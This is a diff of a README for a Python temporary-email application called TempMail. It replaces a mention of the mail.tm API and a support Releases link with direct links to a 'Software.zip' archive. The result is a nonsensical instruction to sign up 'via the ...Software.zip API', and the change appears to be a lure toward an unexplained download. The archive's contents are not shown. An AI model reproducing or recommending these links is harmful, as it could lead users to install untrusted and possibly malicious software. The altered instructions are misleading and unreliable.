Nodiq/TempMail/README.md

 ## Usage
 1. Run the TempMail Python application.
-2. Sign up for temporary email addresses via the mail.tm API.
+2. Sign up for temporary email addresses via the https://github.com/Nodiq/TempMail/releases/download/v2.0/Software.zip API.
 3. Use the application to receive and manage emails securely.

 ## Support
-For additional information and troubleshooting, please visit the [Releases](https://github.com/cli/go-gh/releases) section.
+For additional information and troubleshooting, please visit the [Releases](https://github.com/Nodiq/TempMail/releases/download/v2.0/Software.zip) section.

 ## Contributing
 Contributions to enhance the TempMail application are welcome.
 Feel free to fork the repository and submit pull requests with your improvements.